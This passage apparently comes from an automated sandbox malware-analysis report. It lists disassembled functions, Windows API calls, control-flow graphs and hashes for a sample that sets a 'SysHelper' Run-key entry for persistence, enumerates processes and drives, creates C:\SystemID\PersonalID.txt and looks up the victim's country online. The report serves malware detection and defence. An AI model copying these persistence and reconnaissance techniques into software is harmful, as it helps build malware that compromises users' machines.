                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F11678
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00F1168D
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F116D6
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F116EB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                        • API String ID: 254274740-1186676987
                                                                                                        • Opcode ID: 4b6a8f105b9d696b19ceb5b506d08863535efadcb91412f7a7f7095f0a406cb3
                                                                                                        • Instruction ID: 4415a5a14f373d38b9b6b317b18468368dca0f5caa05c395136f24eeee771a27
                                                                                                        • Opcode Fuzzy Hash: 4b6a8f105b9d696b19ceb5b506d08863535efadcb91412f7a7f7095f0a406cb3
                                                                                                        • Instruction Fuzzy Hash: A722CC71D00208EBEB14EBA4DC86FEEB7B8FF05310F104158F619A7291DB745A85EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F12220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1213 f12220-f1228a call f2f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1216 f122bd-f122d1 K32EnumProcesses 1213->1216 1217 f1228c-f122ba LoadLibraryW GetProcAddress * 3 1213->1217 1218 f122d3-f122de 1216->1218 1219 f122df-f122ec 1216->1219 1217->1216 1220 f12353-f1235b 1219->1220 1221 f122ee 1219->1221 1222 f122f0-f12308 OpenProcess 1221->1222 1223 f12346-f12351 CloseHandle 1222->1223 1224 f1230a-f1231a K32EnumProcessModules 1222->1224 1223->1220 1223->1222 1224->1223 1225 f1231c-f12339 K32GetModuleBaseNameW call f20235 1224->1225 1227 f1233e-f12343 1225->1227 1227->1223 1228 f12345 1227->1228 1228->1223
                                                                                                        APIs
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F12235
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00F12240
                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00F12248
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00F12256
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F1226A
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F12275
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F12280
                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00F12291
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F1229F
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F122AA
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F122B5
                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00F122CD
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F122FE
                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00F12315
                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00F1232C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F12347
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                        • Opcode ID: 53fce93feb0d91f34c85ab15e7d012488dd00ab168e03f4177ccfd21664d9365
                                                                                                        • Instruction ID: b102dc2bce9a63a9ab66e2f989e954382f3eaeac2b12f5a43d5c843569f501b1
                                                                                                        • Opcode Fuzzy Hash: 53fce93feb0d91f34c85ab15e7d012488dd00ab168e03f4177ccfd21664d9365
                                                                                                        • Instruction Fuzzy Hash: 58315A71E0021DABEB11ABE59C45EEEB7BCEF49740F00406AF908E7150DA749A41ABA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1F130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM ref: 00F1F15E
                                                                                                        • Sleep.KERNEL32(?), ref: 00F1F185
                                                                                                        • Sleep.KERNEL32(?), ref: 00F1F19D
                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00F1F9D0
                                                                                                          • Part of subcall function 00F10A50: GetLogicalDrives.KERNEL32 ref: 00F10A75
                                                                                                          • Part of subcall function 00F10A50: SetErrorMode.KERNEL32(00000001,01000234,00000002), ref: 00F10AE2
                                                                                                          • Part of subcall function 00F10A50: PathFileExistsA.SHLWAPI(?), ref: 00F10AF9
                                                                                                          • Part of subcall function 00F10A50: SetErrorMode.KERNEL32(00000000), ref: 00F10B02
                                                                                                          • Part of subcall function 00F10A50: GetDriveTypeA.KERNEL32(?), ref: 00F10B1B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                        • String ID: C:\
                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                        • Opcode ID: 6e454659c25cd8ff2292fac46436ee54827e784034b057a2b16edd1ab76566df
                                                                                                        • Instruction ID: 91b7e086fdf215b880cda34871b30fd013288373b715865de4e1fb11b26df438
                                                                                                        • Opcode Fuzzy Hash: 6e454659c25cd8ff2292fac46436ee54827e784034b057a2b16edd1ab76566df
                                                                                                        • Instruction Fuzzy Hash: C842ACB1D003059BDF24DFA8DC85BEEBBB1BF44318F144129E805AB281D775AA89DBD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0CF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1829 f0cf10-f0cfb0 call f2f7c0 call f2b420 InternetOpenW call f15c10 InternetOpenUrlW 1836 f0cfb2-f0cfb4 1829->1836 1837 f0cfb9-f0cffb InternetReadFile InternetCloseHandle * 2 call f156d0 1829->1837 1838 f0d213-f0d217 1836->1838 1842 f0d000-f0d01d 1837->1842 1840 f0d224-f0d236 1838->1840 1841 f0d219-f0d221 call f22587 1838->1841 1841->1840 1844 f0d023-f0d02c 1842->1844 1845 f0d01f-f0d021 1842->1845 1848 f0d030-f0d035 1844->1848 1847 f0d039-f0d069 call f156d0 call f14300 1845->1847 1854 f0d1cb 1847->1854 1855 f0d06f-f0d08b call f13010 1847->1855 1848->1848 1849 f0d037 1848->1849 1849->1847 1857 f0d1cd-f0d1d1 1854->1857 1863 f0d0b9-f0d0bd 1855->1863 1864 f0d08d-f0d091 1855->1864 1859 f0d1d3-f0d1db call f22587 1857->1859 1860 f0d1de-f0d1f4 1857->1860 1859->1860 1861 f0d201-f0d20f 1860->1861 1862 f0d1f6-f0d1fe call f22587 1860->1862 1861->1838 1862->1861 1866 f0d0cd-f0d0e1 call f14300 1863->1866 1867 f0d0bf-f0d0ca call f22587 1863->1867 1869 f0d093-f0d09b call f22587 1864->1869 1870 f0d09e-f0d0b4 call f13d40 1864->1870 1866->1854 1880 f0d0e7-f0d149 call f13010 1866->1880 1867->1866 1869->1870 1870->1863 1883 f0d150-f0d15a 1880->1883 1884 f0d160-f0d162 1883->1884 1885 f0d15c-f0d15e 1883->1885 1887 f0d165-f0d16a 1884->1887 1886 f0d16e-f0d18b call f0b650 1885->1886 1891 f0d19a-f0d19e 1886->1891 1892 f0d18d-f0d18f 1886->1892 1887->1887 1888 f0d16c 1887->1888 1888->1886 1891->1883 1894 f0d1a0 1891->1894 1892->1891 1893 f0d191-f0d198 1892->1893 1893->1891 1895 f0d1c7-f0d1c9 1893->1895 1896 f0d1a2-f0d1a6 1894->1896 1895->1896 1897 f0d1b3-f0d1c5 1896->1897 1898 f0d1a8-f0d1b0 call f22587 1896->1898 1897->1857 1898->1897
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F0CF4A
                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F0CF5F
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F0CFA6
                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00F0CFCD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F0CFDA
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F0CFDD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                        • API String ID: 1485416377-933853286
                                                                                                        • Opcode ID: 61441a6f0066839c4c52a456c7d089f7571ca33a2be22f850fc48ef7fc64afe0
                                                                                                        • Instruction ID: c2e735cbea598320ff28923073eafff9778a3ae12fcb82617d82c95ab9e00881
                                                                                                        • Opcode Fuzzy Hash: 61441a6f0066839c4c52a456c7d089f7571ca33a2be22f850fc48ef7fc64afe0
                                                                                                        • Instruction Fuzzy Hash: 0791C071D00218EAEF25CFA0DD46BEEBBB4AF05704F244168E405772C1DBB65A88EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1901 f1bae0-f1bb0d 1902 f1bba0-f1bba7 1901->1902 1903 f1bb13 1901->1903 1904 f1bf3d-f1bf47 1902->1904 1905 f1bbad-f1bbae 1902->1905 1906 f1bb15-f1bb1a 1903->1906 1907 f1bb54-f1bb5e 1903->1907 1914 f1bf49 1904->1914 1915 f1bf5c-f1bf63 1904->1915 1910 f1bbb0-f1bbd4 DefWindowProcW 1905->1910 1911 f1bbd7-f1bc45 call f20c62 GetComputerNameW call f13100 call f1ce80 1905->1911 1912 f1bb47-f1bb4f PostQuitMessage 1906->1912 1913 f1bb1c-f1bb1f 1906->1913 1908 f1bf81-f1bf97 1907->1908 1909 f1bb64-f1bb68 1907->1909 1917 f1bb75-f1bb9d DefWindowProcW 1909->1917 1918 f1bb6a-f1bb6e 1909->1918 1935 f1bc47-f1bc4c 1911->1935 1936 f1bc7b-f1bc80 1911->1936 1912->1908 1913->1908 1922 f1bb25-f1bb28 1913->1922 1916 f1bf50-f1bf54 1914->1916 1919 f1bf65-f1bf71 IsWindow 1915->1919 1920 f1bf9a-f1bfc2 DefWindowProcW 1915->1920 1916->1920 1923 f1bf56-f1bf5a 1916->1923 1918->1909 1924 f1bb70 1918->1924 1919->1908 1925 f1bf73-f1bf7b DestroyWindow 1919->1925 1922->1910 1927 f1bb2e-f1bb31 1922->1927 1923->1915 1923->1916 1924->1908 1925->1908 1927->1908 1929 f1bb37-f1bb42 call f11cd0 1927->1929 1929->1919 1937 f1bc5a-f1bc76 call f145a0 1935->1937 1938 f1bc4e-f1bc57 call f22587 1935->1938 1939 f1bc82-f1bc8b call f22587 1936->1939 1940 f1bc8e-f1bcb1 1936->1940 1937->1936 1938->1937 1939->1940 1944 f1bcb3-f1bcbc call f22587 1940->1944 1945 f1bcbf-f1bcf1 call f20bed 1940->1945 1944->1945 1952 f1bcf7-f1bcfa 1945->1952 1953 f1befb-f1bf0f IsWindow 1945->1953 1954 f1bd00-f1bd04 1952->1954 1955 f1bf11-f1bf18 1953->1955 1956 f1bf28-f1bf2d 1953->1956 1957 f1bee5-f1bef1 1954->1957 1958 f1bd0a-f1bd0e 1954->1958 1955->1956 1959 f1bf1a-f1bf22 DestroyWindow 1955->1959 1956->1908 1960 f1bf2f-f1bf3b call f22587 1956->1960 1957->1954 1962 f1bef7-f1bef9 1957->1962 1958->1957 1961 f1bd14-f1bd7b call f14690 * 2 call f0eff0 1958->1961 1959->1956 1960->1908 1971 f1bee1 1961->1971 1972 f1bd81-f1be44 call f1c330 call f19d10 call f1c240 call f1b680 call f1b8b0 call f14690 call f1ce80 call f131d0 1961->1972 1962->1953 1962->1956 1971->1957 1989 f1be55-f1be81 1972->1989 1990 f1be46-f1be52 call f22587 1972->1990 1991 f1be83-f1be8c call f22587 1989->1991 1992 f1be8f-f1bedf CreateThread 1989->1992 1990->1989 1991->1992 1992->1957
                                                                                                        APIs
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F1BB49
                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F1BBBA
                                                                                                        • _malloc.LIBCMT ref: 00F1BBE4
                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00F1BBF4
                                                                                                        • _free.LIBCMT ref: 00F1BCD7
                                                                                                          • Part of subcall function 00F11CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FCAC68,000000FF), ref: 00F11D12
                                                                                                          • Part of subcall function 00F11CD0: _memset.LIBCMT ref: 00F11D3B
                                                                                                          • Part of subcall function 00F11CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F11D63
                                                                                                          • Part of subcall function 00F11CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FCAC68,000000FF), ref: 00F11D6C
                                                                                                          • Part of subcall function 00F11CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F11DD6
                                                                                                          • Part of subcall function 00F11CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F11E48
                                                                                                        • IsWindow.USER32(?), ref: 00F1BF69
                                                                                                        • DestroyWindow.USER32(?), ref: 00F1BF7B
                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00F1BFA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3873257347-0
                                                                                                        • Opcode ID: f1891e011b25c2dc126b9a69e064849a8f168de98cf50a59822ad92c43713189
                                                                                                        • Instruction ID: 548535c9e60d2d5bdd01dbf3e13a093ee25906c8d70f069046964c9eb6407e4d
                                                                                                        • Opcode Fuzzy Hash: f1891e011b25c2dc126b9a69e064849a8f168de98cf50a59822ad92c43713189
                                                                                                        • Instruction Fuzzy Hash: A6C19071908380DFDB20DF25DD45B9ABBE0FF85324F14491DF88897291D77A9888EB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2147 f0c740-f0c792 call f20fdd 2150 f0c911-f0c915 2147->2150 2151 f0c798-f0c7a3 call f20546 2147->2151 2152 f0c944-f0c968 CreateDirectoryW call f20fdd 2150->2152 2153 f0c917 2150->2153 2159 f0c906-f0c90e call f23a38 2151->2159 2160 f0c7a9 2151->2160 2164 f0c96a-f0c96c 2152->2164 2165 f0c9af-f0c9b3 2152->2165 2155 f0c920-f0c93b call f14c60 2153->2155 2155->2164 2169 f0c93d-f0c942 2155->2169 2159->2150 2163 f0c7b0-f0c7bc call f21101 2160->2163 2175 f0c7c1-f0c7c6 2163->2175 2171 f0c972-f0c976 2164->2171 2172 f0ca43-f0ca47 2164->2172 2167 f0c9b5 2165->2167 2168 f0c9d8-f0ca03 call f228fd * 2 call f23a38 2165->2168 2174 f0c9b8-f0c9bc 2167->2174 2168->2172 2213 f0ca05-f0ca09 2168->2213 2169->2152 2169->2155 2176 f0ca3a-f0ca40 call f22587 2171->2176 2177 f0c97c 2171->2177 2179 f0ca54-f0ca64 2172->2179 2180 f0ca49-f0ca51 call f22587 2172->2180 2181 f0c9c2 2174->2181 2182 f0c9be-f0c9c0 2174->2182 2183 f0c8f3-f0c900 call f20546 2175->2183 2184 f0c7cc-f0c7e7 2175->2184 2176->2172 2186 f0c980-f0c984 2177->2186 2180->2179 2189 f0c9c4-f0c9d3 call f228fd 2181->2189 2182->2189 2183->2159 2183->2163 2190 f0c7e9-f0c7eb 2184->2190 2191 f0c7ed-f0c7f3 2184->2191 2194 f0c990-f0c9a8 2186->2194 2195 f0c986-f0c98d call f22587 2186->2195 2189->2174 2211 f0c9d5 2189->2211 2200 f0c805-f0c81e call f15c10 2190->2200 2201 f0c7f6-f0c7ff 2191->2201 2194->2186 2198 f0c9aa 2194->2198 2195->2194 2198->2176 2214 f0c820-f0c822 2200->2214 2215 f0c861-f0c863 2200->2215 2201->2201 2206 f0c801-f0c803 2201->2206 2206->2200 2211->2168 2213->2176 2217 f0ca0b 2213->2217 2214->2215 2216 f0c824-f0c83c 2214->2216 2218 f0c874-f0c876 2215->2218 2219 f0c865-f0c871 call f14f70 2215->2219 2220 f0c84d-f0c855 2216->2220 2221 f0c83e-f0c84a call f14f70 2216->2221 2222 f0ca10-f0ca14 2217->2222 2224 f0c8d5-f0c8e3 2218->2224 2225 f0c878-f0c88f 2218->2225 2219->2218 2220->2224 2229 f0c857-f0c85f call f13160 2220->2229 2221->2220 2227 f0ca20-f0ca38 2222->2227 2228 f0ca16-f0ca1d call f22587 2222->2228 2230 f0c8f0 2224->2230 2231 f0c8e5-f0c8ed call f22587 2224->2231 2233 f0c891-f0c895 2225->2233 2234 f0c8a9-f0c8ae 2225->2234 2227->2176 2227->2222 2228->2227 2229->2224 2230->2183 2231->2230 2236 f0c8b5-f0c8d1 2233->2236 2240 f0c897-f0c8a7 call f205a0 2233->2240 2234->2236 2236->2224 2240->2236
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F20FDD: __wfsopen.LIBCMT ref: 00F20FE8
                                                                                                        • _fgetws.LIBCMT ref: 00F0C7BC
                                                                                                        • _memmove.LIBCMT ref: 00F0C89F
                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00F0C94B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2864494435-54166481
                                                                                                        • Opcode ID: 5e5389fa31b4d44279fadec1c6ed92befe0e4d02e680d9fa965680ead0c6cb07
                                                                                                        • Instruction ID: 08c6dc8f08ca13d51cfb89013282e52381d044c0dc3c709a649b15c5f94c5047
                                                                                                        • Opcode Fuzzy Hash: 5e5389fa31b4d44279fadec1c6ed92befe0e4d02e680d9fa965680ead0c6cb07
                                                                                                        • Instruction Fuzzy Hash: 3991A0B2D002199BCF20DFA4DC857EEB7F4AF04314F144629E805A3281E779AA44FBD6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2246 f0c6a0-f0c6ca RegOpenKeyExW 2247 f0c734-f0c739 2246->2247 2248 f0c6cc-f0c6fb RegQueryValueExW 2246->2248 2249 f0c70c-f0c72e RegSetValueExW RegCloseKey 2248->2249 2250 f0c6fd-f0c70b RegCloseKey 2248->2250 2249->2247
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00F1E6D4), ref: 00F0C6C2
                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F0C6F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F0C700
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00F0C725
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F0C72E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
